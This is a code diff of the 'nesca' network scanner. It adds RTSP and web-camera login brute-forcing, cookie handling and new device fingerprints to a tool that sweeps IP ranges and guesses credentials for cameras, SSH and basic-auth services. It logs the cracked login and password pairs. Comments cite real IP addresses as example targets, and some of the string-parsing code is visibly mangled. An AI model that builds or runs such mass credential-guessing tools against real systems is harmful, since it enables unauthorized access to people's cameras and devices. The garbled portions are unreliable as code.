@@ -227,10 +274,13 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC)
return lps;
};
}
+ else {
+ return lps;
+ }
if (BALogSwitched) {
if (rowIndex == -1) {
- rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(port),
+ rowIndex = nesca_3::addBARow(QString(ip),
QString(login) + ":" + QString(pass),
QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
}
@@ -245,7 +295,7 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC)
};
};
if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "FAIL");
+ nesca_3::addBARow(QString(ip), "--", "FAIL");
}
else {
stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
@@ -253,14 +303,14 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC)
return lps;
}
-lopaStr IPC::IPCLobby(const char *ip, int port, char *SPEC) {
+lopaStr IPC::IPCLobby(const char *ip, int port, char *SPEC, const std::string *cookie) {
if(gMaxBrutingThreads > 0) {
while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
++baCount;
++BrutingThrds;
stt->doEmitionUpdateArc(gTargets);
- lopaStr lps = IPCBrute(ip, port, SPEC);
+ lopaStr lps = IPCBrute(ip, port, SPEC, cookie);
--BrutingThrds;
return lps;
diff --git a/IPCAuth.h b/IPCAuth.h
index 5463b53..1179ce4 100644
--- a/IPCAuth.h
+++ b/IPCAuth.h
@@ -9,7 +9,7 @@ private:
bool doPost;
char postData[1024];
private:
- lopaStr IPCBrute(const char *ip, int port, char *SPEC);
+ lopaStr IPCBrute(const char *ip, int port, char *SPEC, const std::string *cookie);
public:
IPC() {
@@ -18,7 +18,7 @@ public:
postData[0] = 0;
}
- lopaStr IPCLobby(const char *ip, int port, char *SPEC);
+ lopaStr IPCLobby(const char *ip, int port, char *SPEC, const std::string *cookie);
};
#endif // IPCAUTH_H
diff --git a/MainStarter.cpp b/MainStarter.cpp
index eb4e4f1..8ba17ea 100644
--- a/MainStarter.cpp
+++ b/MainStarter.cpp
@@ -1347,27 +1347,30 @@ void MainStarter::startImportScan(){
break;
}
case false: {
- ip1 = (ipsstartfl[gflIndex][0] * 16777216) +
- (ipsstartfl[gflIndex][1] * 65536) +
- (ipsstartfl[gflIndex][2] * 256) +
- ipsstartfl[gflIndex][3];
- ip2 = (ipsendfl[gflIndex][0] * 16777216) +
- (ipsendfl[gflIndex][1] * 65536) +
- (ipsendfl[gflIndex][2] * 256) +
- ipsendfl[gflIndex][3];
- struct in_addr tAddr;
- for (unsigned long i = ip1; i <= ip2; ++i) {
+ for (gflIndex = 0; gflIndex < MainStarter::flCounter; gflIndex++) {
+ if (!globalScanFlag) break;
+ ip1 = (ipsstartfl[gflIndex][0] * 16777216) +
+ (ipsstartfl[gflIndex][1] * 65536) +
+ (ipsstartfl[gflIndex][2] * 256) +
+ ipsstartfl[gflIndex][3];
+ ip2 = (ipsendfl[gflIndex][0] * 16777216) +
+ (ipsendfl[gflIndex][1] * 65536) +
+ (ipsendfl[gflIndex][2] * 256) +
+ ipsendfl[gflIndex][3];
+ struct in_addr tAddr;
+ for (unsigned long i = ip1; i <= ip2; ++i) {
- while (cons >= gThreads && globalScanFlag) Sleep(500);
- if (!globalScanFlag) break;
+ while (cons >= gThreads && globalScanFlag) Sleep(500);
+ if (!globalScanFlag) break;
- ++indexIP;
+ ++indexIP;
- tAddr.s_addr = ntohl(i);
- strcpy(currentIP, inet_ntoa(tAddr));
- verboseProgress(gTargets);
- Threader::fireThread(currentIP, (void*(*)(void))_connect);
- }
+ tAddr.s_addr = ntohl(i);
+ strcpy(currentIP, inet_ntoa(tAddr));
+ verboseProgress(gTargets);
+ Threader::fireThread(currentIP, (void*(*)(void))_connect);
+ }
+ }
break;
};
}
diff --git a/SSHAuth.cpp b/SSHAuth.cpp
index b3d4bf1..123021e 100644
--- a/SSHAuth.cpp
+++ b/SSHAuth.cpp
@@ -91,7 +91,7 @@ int check_ssh_pass(const int rowIndex, const char *user, const char *pass,
if(res == 0)
{
if (rowIndex == -1) {
- nesca_3::addBARow(QString(host) + ":" + QString::number(port), QString(userPass) + "@" + QString(host), "OK");
+ nesca_3::addBARow(QString(host), QString(userPass) + "@" + QString(host), "OK");
}
else {
stt->doEmitionChangeBARow(rowIndex, QString(userPass) + "@" + QString(host), "OK");
@@ -127,6 +127,8 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner
return -1;
}
+ ZeroMemory(login, 32);
+ ZeroMemory(pass, 32);
strncpy(login, temp, ptr1 - temp);
strcpy(pass, ptr1 + 1);
diff --git a/STh.cpp b/STh.cpp
index 32877b5..304a4a9 100644
--- a/STh.cpp
+++ b/STh.cpp
@@ -44,6 +44,10 @@ void STh::doEmitionGreenFoundData(QString str)
{
emit stt->changeGreenFoundData(str);
}
+void STh::doEmitionFoundDataCustom(QString str, QString color)
+{
+ emit stt->foundDataCustom(str, color);
+}
void STh::doEmitionYellowFoundData(QString str)
{
emit stt->changeYellowFoundData(str);
diff --git a/STh.h b/STh.h
index aed021a..c923abe 100644
--- a/STh.h
+++ b/STh.h
@@ -43,6 +43,7 @@ public:
static void doEmitionRedFoundData(QString str);
static void doEmitionGreenFoundData(QString);
static void doEmitionYellowFoundData(QString);
+ static void doEmitionFoundDataCustom(QString, QString);
static void doEmitionKillSttThread();
static void doEmitionDebugFoundData(QString);
@@ -62,6 +63,7 @@ public: signals: void signalDataSaved(bool);
public: signals: void changeFoundData(QString);
public: signals: void changeRedFoundData(QString);
public: signals: void changeGreenFoundData(QString);
+public: signals: void foundDataCustom(QString, QString);
public: signals: void changeYellowFoundData(QString);
public: signals: void changeDebugFoundData(QString);
public: signals: void killSttThread();
diff --git a/Utils.cpp b/Utils.cpp
index fd4f885..002a07c 100644
--- a/Utils.cpp
+++ b/Utils.cpp
@@ -25,6 +25,24 @@ std::string Utils::startTime;
//}
+std::string Utils::getHeaderValue(std::string *buff, const std::string headerValue, const std::string outputName) {
+ if (buff->size() > 0) {
+ int headerSize = headerValue.size();
+ int pos = buff->find(headerValue);
+ if (-1 != pos) {
+ int diff = pos + headerSize;
+ std::string fieldChunk = buff->substr(diff, buff->find("\r\n", pos) - diff);
+ std::string fieldHeader = outputName + fieldChunk.substr(0, fieldChunk.find(";"));
+ return fieldHeader;
+ }
+ else {
+ return "";
+ }
+ }
+ else {
+ return "";
+ }
+}
void Utils::saveStartDate() {
QDate date = QDate::currentDate();
startDate = std::to_string(date.day())
diff --git a/Utils.h b/Utils.h
index 99cef40..83235ce 100644
--- a/Utils.h
+++ b/Utils.h
@@ -92,6 +92,7 @@ public:
static std::string getStartDate();
static std::string getStartTime();
static void emitScaryError();
+ static std::string getHeaderValue(std::string *buff, const std::string headerValue, const std::string outputName);
};
#endif // UTILS_H
diff --git a/finder.cpp b/finder.cpp
index 2c47387..d1ff65a 100644
--- a/finder.cpp
+++ b/finder.cpp
@@ -12,6 +12,7 @@
#include "IPCAuth.h"
#include
#include "HikvisionLogin.h"
+#include "RTSP.h"
unsigned char tl(unsigned char d)
{
@@ -237,10 +238,9 @@ bool isNegative(const std::string *buff, const char *ip, int port, const char *c
if (gNegDebugMode)
{
QTextCodec *nCodec = QTextCodec::codecForName("Windows-1251");
- stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) +
- "" + "]\tNegative hit: \"" + nCodec->toUnicode(negEntry.c_str()).toHtmlEscaped()
- + "\"");
+ stt->doEmitionDebugFoundData("[" + QString(ip) +
+ "" + "]\tNegative hit: \"" + nCodec->toUnicode(negEntry.c_str()).toHtmlEscaped() + "\"");
}
++filtered;
@@ -256,8 +256,8 @@ bool isNegative(const std::string *buff, const char *ip, int port, const char *c
if (gNegDebugMode)
{
QTextCodec *nCodec = QTextCodec::codecForName("Windows-1251");
- stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) +
+ stt->doEmitionDebugFoundData("[" + QString(ip) +
"]\tNegative hit: Size:" + QString::number(nSz));
}
return true;
@@ -303,8 +303,8 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const
{
if (gNegDebugMode)
{
- stt->doEmitionDebugFoundData("Safari CCTV check failed - ignoring [" + QString(ip) + ":" + QString::number(port) + "]");
+ stt->doEmitionDebugFoundData("Safari CCTV check failed - ignoring [" + QString(ip) + "]");
}
return -1;
}
@@ -317,8 +317,8 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const
{
if (gNegDebugMode)
{
- stt->doEmitionDebugFoundData("Hikkvision iVMS check failed - ignoring [" + QString(ip) + ":" + QString::number(port) + "]");
+ stt->doEmitionDebugFoundData("Hikkvision iVMS check failed - ignoring [" + QString(ip) + "]");
}
return -1;
}
@@ -331,8 +331,8 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const
{
if (gNegDebugMode)
{
- stt->doEmitionDebugFoundData("RVI check failed - ignoring [" + QString(ip) + ":" + QString::number(port) + "]");
+ stt->doEmitionDebugFoundData("RVI check failed - ignoring [" + QString(ip) + "]");
}
return -1;
}
@@ -463,6 +463,9 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const
&& Utils::ustrstr(buffcpy, "login_chk_usr_pwd") != -1
) return 57; //Network video client (http://203.190.113.54:60001/)
if (Utils::ustrstr(buffcpy, "QlikView") != -1) return 58; //QLikView (http://203.96.113.183/qlikview/login.htm)
+ if (Utils::ustrstr(buffcpy, "RTSP/1.0") != -1) return 59; //RTSP (http://121.72.55.19:554/ Hisilicon Ipcam)
+ if (Utils::ustrstr(buffcpy, "ACTi Corporation") != -1) return 60; //ACTi (http://87.197.30.20/cgi-bin/videoconfiguration.cgi)
+ if (Utils::ustrstr(buffcpy, "airos_logo") != -1) return 61; //AirOS (http://103.5.73.114/login.cgi?uri=/)
//if (Utils::ustrstr(buffcpy, "ShareCenter") != -1) return 58; //ShareCenter (http://49.50.207.6/)
@@ -521,7 +524,7 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const
int firstStage(const std::string *buffcpy, int port, const char *ip, const char *cp, int sz)
{
if (buffcpy->size() == 0 && sz != 0) {
- stt->doEmitionYellowFoundData("Strange behavior: 0 bytes. " + QString(ip) + ":" + QString::number(port));
+ stt->doEmitionYellowFoundData("Strange behavior: 0 bytes. " + QString(ip));
return -1;
}
int flag = sharedDetector(ip, port, buffcpy, cp);
@@ -615,7 +618,7 @@ bool ftsSSH = true;
bool ftsFTP = true;
bool ftsBA = true;
std::atomic fOpened(false);
-void fputsf(char *text, int flag, char *msg)
+void fputsf(char *text, int flag)
{
FILE *file = NULL;
@@ -709,7 +712,7 @@ void fputsf(char *text, int flag, char *msg)
char tmsg[1024] = {0};
ftsCameras = false;
strcpy(tmsg, "" TYPE1 "");
- strcat(tmsg, msg);
+ //strcat(tmsg, msg);
strcat(tmsg, HTTP_FILE_STYLE);
fputs (tmsg, file);
fputs(HTTP_FILE_HEADER, file);
@@ -719,7 +722,7 @@ void fputsf(char *text, int flag, char *msg)
char tmsg[1024] = {0};
ftsOther = false;
strcpy(tmsg, "" TYPE2 "");
- strcat(tmsg, msg);
+ //strcat(tmsg, msg);
strcat(tmsg, HTTP_FILE_STYLE);
fputs (tmsg, file);
fputs(HTTP_FILE_HEADER, file);
@@ -729,7 +732,7 @@ void fputsf(char *text, int flag, char *msg)
char tmsg[1024] = {0};
ftsOther = false;
strcpy(tmsg, "" TYPE5 "");
- strcat(tmsg, msg);
+ //strcat(tmsg, msg);
strcat(tmsg, HTTP_FILE_STYLE);
fputs (tmsg, file);
fputs(HTTP_FILE_HEADER, file);
@@ -739,7 +742,7 @@ void fputsf(char *text, int flag, char *msg)
char tmsg[1024] = {0};
ftsFTP = false;
strcpy(tmsg, "" TYPE4 "");
- strcat(tmsg, msg);
+ //strcat(tmsg, msg);
strcat(tmsg, HTTP_FILE_STYLE);
fputs (tmsg, file);
fputs(HTTP_FILE_HEADER, file);
@@ -749,7 +752,7 @@ void fputsf(char *text, int flag, char *msg)
char tmsg[1024] = {0};
ftsBA = false;
strcpy(tmsg, "" TYPE3 "");
- strcat(tmsg, msg);
+ //strcat(tmsg, msg);
strcat(tmsg, HTTP_FILE_STYLE);
fputs (tmsg, file);
fputs(HTTP_FILE_HEADER, file);
@@ -780,8 +783,8 @@ void putInFile(int flag, const char *ip, int port, int size, const char *finalst
char log[4096] = {0}, msg[512] = {0};
QTextCodec *codec;
- sprintf(msg, "%s:%d",
- ip, port, ip, port);
+ sprintf(msg, "%s",
+ ip, ip);
QString resMes(msg);
QString strf;
@@ -819,8 +822,8 @@ void putInFile(int flag, const char *ip, int port, int size, const char *finalst
resMes.replace("[PK]", PEKO_PIC);
stt->doEmitionFoundData(resMes.replace("[R]", REDIRECT_PIC));
- sprintf(log, "%s:%d; Received: %d",
- ip, port, ip, port, size);
+ sprintf(log, "%s; Received: %d",
+ ip, ip, size);
//Generic camera
if(flag == 0 || flag == 15 || flag == -10)
@@ -842,17 +845,60 @@ void putInFile(int flag, const char *ip, int port, int size, const char *finalst
};
strcat(log, "\n");
- fputsf (log, flag, msg);
+ fputsf (log, flag);
//ZeroMemory(msg, strlen(msg));
msg[0] = 0;
}
+//void _specFillerWF(const char *ip, int port, const char *finalstr, const char *login, const char *pass, int flag)
+//{
+// char log[512] = { 0 };
+//
+// ++PieBA;
+//
+// if (strlen(login) > 0 || strlen(pass) > 0)
+// {
+// sprintf(log, "[WF]:%s (%s:%s) T: %s\n",
+// ip, ip, login, pass, finalstr);
+// }
+//
+// stt->doEmitionFoundData(QString::fromLocal8Bit(log));
+//
+// fputsf(log, flag);
+//}
+void _specFillerCustom(const char *ip, int port, const char *finalstr, const char *login, const char *pass, int flag, const char *classString) {
+ char log[512] = { 0 };
+
+ ++PieBA;
+
+ if (strlen(login) > 0 || strlen(pass) > 0)
+ {
+ sprintf(log, "%s:%s (%s:%s) T: %s\n",
+ classString, ip, ip, login, pass, finalstr);
+ }
+
+ stt->doEmitionFoundData(QString::fromLocal8Bit(log));
+
+ fputsf(log, flag);
+}
void _specFillerBA(const char *ip, int port, const char *finalstr, const char *login, const char *pass, int flag)
{
- char log[512] = {0};
+ /* char log[512] = {0};
++PieBA;
+
+ if (strlen(login) > 0 || strlen(pass) > 0)
+ {
+ sprintf(log, "[BA]:%s:%s@%s T: %s\n",
+ login, pass, ip, login, pass, ip, finalstr);
+ }
+
+ stt->doEmitionFoundData(QString::fromLocal8Bit(log));
+
+ fputsf(log, flag);*/
+
+ char log[512] = { 0 };
int offset = 0;
if (strstri(ip, "https://") != NULL) {
@@ -865,27 +911,48 @@ void _specFillerBA(const char *ip, int port, const char *finalstr, const char *l
if (strlen(login) > 0 || strlen(pass) > 0)
{
if (8 == offset) {
- sprintf(log, "[BA]:%s:%s@%s:%d T: %s\n",
- login, pass, ip + offset, port, login, pass, ip + offset, port, finalstr);
+ sprintf(log, "[BA]:%s:%s@%s T: %s\n",
+ login, pass, ip + offset, login, pass, ip + offset, finalstr);
}
else {
- sprintf(log, "[BA]:%s:%s@%s:%d T: %s\n",
- login, pass, ip + offset, port, login, pass, ip + offset, port, finalstr);
+ sprintf(log, "[BA]:%s:%s@%s T: %s\n",
+ login, pass, ip + offset, login, pass, ip + offset, finalstr);
}
} else {
if (8 == offset) {
- sprintf(log, "[BA]:%s:%d T: %s\n",
- ip + offset, port, ip + offset, port, finalstr);
+ sprintf(log, "[BA]:%s T: %s\n",
+ ip + offset, ip + offset, finalstr);
}
else {
- sprintf(log, "[BA]:%s:%d T: %s\n",
- ip + offset, port, ip + offset, port, finalstr);
+ sprintf(log, "[BA]:%s T: %s\n",
+ ip + offset, ip + offset, finalstr);
}
}
stt->doEmitionFoundData(QString::fromLocal8Bit(log));
- fputsf (log , flag, "Basic Authorization");
+ fputsf(log, flag);
+}
+
+void _specFillerRSTP(const char *ip, int port, const char *finalstr, const char *login, const char *pass, int flag)
+{
+ char log[512] = { 0 };
+
+ ++PieBA;
+
+ if (strlen(login) > 0 || strlen(pass) > 0)
+ {
+ sprintf(log, "[RSTP]:%s:%d (%s:%s) T: %s\n",
+ ip, port, login, pass, finalstr);
+ }
+ else {
+ sprintf(log, "[RSTP]:%s:%d T: %s\n",
+ ip, port, finalstr);
+ }
+
+ stt->doEmitionFoundDataCustom(QString::fromLocal8Bit(log), "FF69B4");
+
+ fputsf(log, flag);
}
//void _specFillerWF(const char *ip, int port, char *finalstr, char *login, char *pass, int flag)
@@ -1265,36 +1332,62 @@ void _specFillerBA(const char *ip, int port, const char *finalstr, const char *l
// };
//}
-void _specWEBIPCAMBrute(const char *ip, int port, char *finalstr, int flag, char *comment, char *cp, int size, char *SPEC)
+void _specWEBIPCAMBrute(const char *ip, int port, char *finalstr, int flag, char *comment, char *cp, int size, char *SPEC, std::string *cookie)
{
IPC ipc;
- lopaStr lps = ipc.IPCLobby(ip, port, SPEC);
+ lopaStr lps = ipc.IPCLobby(ip, port, SPEC, cookie);
if(strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0)
{
- _specFillerBA(ip, port, finalstr, lps.login, lps.pass, flag);
+ _specFillerCustom(ip, port, finalstr, lps.login, lps.pass, flag, "[WIC]");
- fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, comment, cp, "Basic Authorization");
+ //fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, comment, cp, "Basic Authorization");
};
}
int _specBrute(const char *ip, int port,
const char *finalstr, int flag,
- char *path, char *comment, char *cp, int size)
+ char *path, char *comment, char *cp, int size, bool performDoubleCheck = false, bool isBA = false)
{
- const lopaStr &lps = BA::BALobby((string(ip) + string(path)).c_str(), port);
+ const lopaStr &lps = BA::BALobby((string(ip) + string(path)).c_str(), port, performDoubleCheck);
if (strcmp(lps.other, "404") == 0) {
- stt->doEmitionRedFoundData("BA - 404 " +
- QString(ip).mid(0, QString(ip).indexOf("/")) + ":" + QString::number(port) + QString(path) + "");
+ stt->doEmitionRedFoundData("BA - 404 " + QString(ip) + QString(path) + "");
return -1;
}
if(strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0)
{
- _specFillerBA(ip, port, finalstr, lps.login, lps.pass, flag);
- fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, "", cp, "Basic Authorization");
+ if (isBA) {
+ _specFillerBA(ip, port, finalstr, lps.login, lps.pass, flag);
+ }
+ else {
+ _specFillerCustom(ip, port, finalstr, lps.login, lps.pass, flag, "[WF]");
+ }
+ return 0;
+ //fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, "", cp, "Basic Authorization");
+ };
+
+ return 1;
+}
+
+int _specRTSPBrute(const char *ip, int port,
+ const char *finalstr, int flag,
+ char *comment, char *cp, int size)
+{
+ const lopaStr &lps = RTSP::RTSPLobby(ip, port);
+
+ if (strcmp(lps.other, "404") == 0) {
+
+ stt->doEmitionFoundDataCustom("RSTP - 404 " + QString(ip) + "", "FF69B4");
+ return -1;
+ }
+
+ if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0)
+ {
+ _specFillerRSTP(ip, port, finalstr, lps.login, lps.pass, flag);
+ fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, "", cp, "RTSP");
};
}
@@ -1434,7 +1527,7 @@ void _saveSSH(const char *ip, int port, int size, const char *buffcpy)
++PieSSH;
- fputsf (log, -22, "SSH");
+ fputsf (log, -22);
char loginSSH[128] = {0};
char passSSH[128] = {0};
const char *ptrl1 = strstr(buffcpy, ":");
@@ -1448,12 +1541,12 @@ void _saveSSH(const char *ip, int port, int size, const char *buffcpy)
}
else
{
- stt->doEmitionRedFoundData("[_saveSSH] Wrong format! [" + QString(ip) + ":" + QString::number(port) + "]");
+ stt->doEmitionRedFoundData("[_saveSSH] Wrong format! [" + QString(ip) + "]");
};
}
else
{
- stt->doEmitionRedFoundData("[_saveSSH] Empty buffer! [" + QString(ip) + ":" + QString::number(port) + "]");
+ stt->doEmitionRedFoundData("[_saveSSH] Empty buffer! [" + QString(ip) + "]");
};
}
@@ -1924,8 +2017,7 @@ void _getLinkFromJSLocation(char *dataBuff, char *str, char *tag, char *ip, int
}
else
{
- stt->doEmitionRedFoundData("[JSLocator] Location extraction failed [" + QString(ip) + ":" + QString::number(port) + "]");
+ stt->doEmitionRedFoundData("[JSLocator] Location extraction failed [" + QString(ip) + "]");
};
};
}
@@ -2372,167 +2464,176 @@ void _getLinkFromJSLocation(char *dataBuff, char *str, char *tag, char *ip, int
static std::atomic hikkaStop(false);
static std::atomic rviStop(false);
std::string getTitle(const char *str, const int flag) {
- const char *ptr1 = NULL, *secondStr = NULL;
- char finalstr[512] = { 0 };
+ if (59 == flag) {
+ std::string strHeader = std::string(str);
+ int strStart = strHeader.find("ver: ");
+ std::string strChunk = strHeader.substr(strStart + 5);
+ std::string headerFinal = strChunk.substr(0, strChunk.find("\r"));
+ return headerFinal;
+ }
+ else {
+ const char *ptr1 = NULL, *secondStr = NULL;
+ char finalstr[512] = { 0 };
- if (strstri(str, "realm") != NULL)
- {
- if ((ptr1 = strstr(str, "\"")) != NULL)
+ if (strstri(str, "realm") != NULL)
{
- int hm;
- if (strstr((ptr1 + 1), "\"") != NULL)
+ if ((ptr1 = strstr(str, "\"")) != NULL)
{
- secondStr = strstr((ptr1 + 1), "\"");
- hm = (int)(secondStr - ptr1);
- }
- else hm = 10;
- strncat(finalstr, ptr1, (hm > 127 ? 20 : hm) + 1);
- }
- else {
- strcat(finalstr, "Strange realm.");
- }
- strcat(finalstr, "::");
- };
-
- if ((ptr1 = strstri(str, "")) != NULL)
- {
- if (strstri(ptr1, "") != NULL) secondStr = strstri(ptr1, "");
- else
- {
- strcat(finalstr, "[Corrupted title]");
- return finalstr;
- };
- int hm = (int)(secondStr - ptr1);
- strncat(finalstr, ptr1 + 7, (hm > 256 ? 20 : hm) - 7);
-
- if (strstri(finalstr, "index of /") != NULL)
- {
- int hm = 0;
- strcat(finalstr, " (");
- if (strstri(ptr1, "description") != NULL) ptr1 = strstri(ptr1, "description");
- if (strstri(ptr1, "") != NULL && strlen(finalstr) < 480)
- {
- if (iterCount++ > 6 || strlen(finalstr) > 300) break;
- if (strstr(ptr1, "\">") != NULL) ptr1 = strstr(ptr1, "\">");
- else break;
- secondStr = strstri(ptr1, "");
-
- hm = (int)(secondStr - ptr1);
-
- strncat(finalstr, ptr1 + 2, (hm > 16 ? 16 : hm) - 2);
- strcat(finalstr, " ");
- if (strstri(ptr1, "")) != NULL) {
- char *ptr2 = strstri(ptr1, "");
- int sz = ptr2 - ptr1;
-
- strncat(finalstr, ptr1 + 4, (sz > 64 ? 64 : sz) - 4);
- }
- else if ((ptr1 = strstri(str, "")) != NULL)
- {
- if (strstri(ptr1, "") != NULL) secondStr = strstri(ptr1, "");
- else
- {
- strcpy(finalstr, "[Corrupted title]");
- return finalstr;
- };
- int hm = (int)(secondStr - ptr1);
- strncat(finalstr, ptr1 + 18, (hm > 127 ? 30 : hm) - 18);
- }
- else if ((ptr1 = strstri(str, "")) != NULL)
- {
- if (strstri(ptr1, "") != NULL) secondStr = strstri(ptr1, "");
- int hm = (int)(secondStr - ptr1);
- strncat(finalstr, ptr1 + 20, (hm > 127 ? 30 : hm) - 20);
- }
- else if ((ptr1 = strstri(str, "") != NULL)
- {
- char *str3 = strstri(str2, ">");
-
- int y = str3 - str2;
- if (y > 256)
+ int hm;
+ if (strstr((ptr1 + 1), "\"") != NULL)
{
- strcpy(finalstr, "[Strange title]");
+ secondStr = strstr((ptr1 + 1), "\"");
+ hm = (int)(secondStr - ptr1);
}
- else
+ else hm = 10;
+ strncat(finalstr, ptr1, (hm > 127 ? 20 : hm) + 1);
+ }
+ else {
+ strcat(finalstr, "Strange realm.");
+ }
+ strcat(finalstr, "::");
+ };
+
+ if ((ptr1 = strstri(str, "")) != NULL)
+ {
+ if (strstri(ptr1, "") != NULL) secondStr = strstri(ptr1, "");
+ else
+ {
+ strcat(finalstr, "[Corrupted title]");
+ return finalstr;
+ };
+ int hm = (int)(secondStr - ptr1);
+ strncat(finalstr, ptr1 + 7, (hm > 256 ? 20 : hm) - 7);
+
+ if (strstri(finalstr, "index of /") != NULL)
+ {
+ int hm = 0;
+ strcat(finalstr, " (");
+ if (strstri(ptr1, "description") != NULL) ptr1 = strstri(ptr1, "description");
+ if (strstri(ptr1, "") != NULL && strlen(finalstr) < 480)
{
- strncat(finalstr, (char*)(str2 + strlen("title=")), y);
- strcat(finalstr, "::");
+ if (iterCount++ > 6 || strlen(finalstr) > 300) break;
+ if (strstr(ptr1, "\">") != NULL) ptr1 = strstr(ptr1, "\">");
+ else break;
+ secondStr = strstri(ptr1, "");
+
+ hm = (int)(secondStr - ptr1);
+
+ strncat(finalstr, ptr1 + 2, (hm > 16 ? 16 : hm) - 2);
+ strcat(finalstr, " ");
+ if (strstri(ptr1, "")) != NULL) {
+ char *ptr2 = strstri(ptr1, "");
+ int sz = ptr2 - ptr1;
+
+ strncat(finalstr, ptr1 + 4, (sz > 64 ? 64 : sz) - 4);
+ }
+ else if ((ptr1 = strstri(str, "")) != NULL)
+ {
+ if (strstri(ptr1, "") != NULL) secondStr = strstri(ptr1, "");
+ else
+ {
+ strcpy(finalstr, "[Corrupted title]");
+ return finalstr;
+ };
+ int hm = (int)(secondStr - ptr1);
+ strncat(finalstr, ptr1 + 18, (hm > 127 ? 30 : hm) - 18);
+ }
+ else if ((ptr1 = strstri(str, "")) != NULL)
+ {
+ if (strstri(ptr1, "") != NULL) secondStr = strstri(ptr1, "");
+ int hm = (int)(secondStr - ptr1);
+ strncat(finalstr, ptr1 + 20, (hm > 127 ? 30 : hm) - 20);
+ }
+ else if ((ptr1 = strstri(str, "") != NULL)
+ {
+ char *str3 = strstri(str2, ">");
+
+ int y = str3 - str2;
+ if (y > 256)
+ {
+ strcpy(finalstr, "[Strange title]");
+ }
+ else
+ {
+ strncat(finalstr, (char*)(str2 + strlen("title=")), y);
+ strcat(finalstr, "::");
+ };
};
};
- };
- }
-
- if (strlen(finalstr) == 0) {
+ }
- if ((ptr1 = strstri(str, "")) != NULL) {
- char *ptr2 = strstri(ptr1, "");
- if (NULL != ptr2) {
- int sz = ptr2 - ptr1;
+ if (strlen(finalstr) == 0) {
- if (ptr1 + 6 == ptr2) {
- strcat(finalstr, "[Empty body]");
+ if ((ptr1 = strstri(str, "")) != NULL) {
+ char *ptr2 = strstri(ptr1, "");
+ if (NULL != ptr2) {
+ int sz = ptr2 - ptr1;
+
+ if (ptr1 + 6 == ptr2) {
+ strcat(finalstr, "[Empty body]");
+ }
+ else {
+ strncat(finalstr, ptr1 + 6, (sz > 64 ? 64 : sz) - 6);
+ }
}
else {
- strncat(finalstr, ptr1 + 6, (sz > 64 ? 64 : sz) - 6);
+ strcat(finalstr, "No closing tag found.");
}
}
- else {
- strcat(finalstr, "No closing tag found.");
- }
- }
- else if ((ptr1 = strstri(str, "")) != NULL) {
- char *ptr2 = strstri(ptr1, "");
- if (NULL != ptr2) {
- int sz = ptr2 - ptr1;
+ else if ((ptr1 = strstri(str, "")) != NULL) {
+ char *ptr2 = strstri(ptr1, "");
+ if (NULL != ptr2) {
+ int sz = ptr2 - ptr1;
- strncat(finalstr, ptr1 + 6, (sz > 64 ? 64 : sz) - 6);
+ strncat(finalstr, ptr1 + 6, (sz > 64 ? 64 : sz) - 6);
+ }
+ else {
+ strcat(finalstr, "No closing tag found.");
+ }
+ }
+ else if ((ptr1 = strstri(str, "\r\n\r\n")) != NULL) {
+ strncat(finalstr, ptr1 + 4, 128);
}
else {
- strcat(finalstr, "No closing tag found.");
+ int sz = strlen(str);
+ strncat(finalstr, str, sz < 64 ? sz : 64);
}
}
- else if ((ptr1 = strstri(str, "\r\n\r\n")) != NULL) {
- strncat(finalstr, ptr1 + 4, 128);
- }
- else {
- int sz = strlen(str);
- strncat(finalstr, str, sz < 64 ? sz : 64);
- }
- }
- std::string result = "";
+ std::string result = "";
- if (flag == 1) {
- result = "[PK]";
- }
+ if (flag == 1) {
+ result = "[PK]";
+ }
- result += std::string(finalstr);
- return result;
+ result += std::string(finalstr);
+ return result;
+ }
}
-bool equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter) {
+std::string equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter) {
if (NULL == buff || 0 == buff->size()) {
- return false;
+ return "";
}
if (counter->iterationCount > 2) {
/*stt->doEmitionFoundData("[" + QString(ip) + ":" + QString::number(port) +
"] - infinite loop detected.");*/
- return false;
+ return "";
}
std::string buffcpy = *buff;
@@ -2540,19 +2641,19 @@ bool equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter
if (-1 == pos) pos = STRSTR((const std::string *) &buffcpy, "http-equiv=refresh");
if (-1 == pos) pos = STRSTR((const std::string *) &buffcpy, "http-equiv='refresh'");
if (-1 == pos) {
- return false;
+ return "";
}
const std::string tempString = buffcpy.substr(pos + 17);
int urlPos = STRSTR(&tempString, "url=");
if (-1 == urlPos) {
- return false;
+ return "";
}
int delimPosFirst = tempString.find_first_of(" \n>\"'", urlPos);
int delimPosSecond = tempString.find_first_of(" \n>\"'", delimPosFirst);
- std::string location;
+ std::string location = "";
if (delimPosFirst == delimPosSecond) {
location = tempString.substr(urlPos + 4, delimPosFirst - (urlPos + 4));
}
@@ -2563,11 +2664,10 @@ bool equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter
Connector con;
int newPort = port;
if (location[0] == '/') {
- std::string tIP = std::string(ip) + ":" + std::to_string(port) + location;
+ std::string tIP = std::string(ip) + location;
if (gDebugMode) {
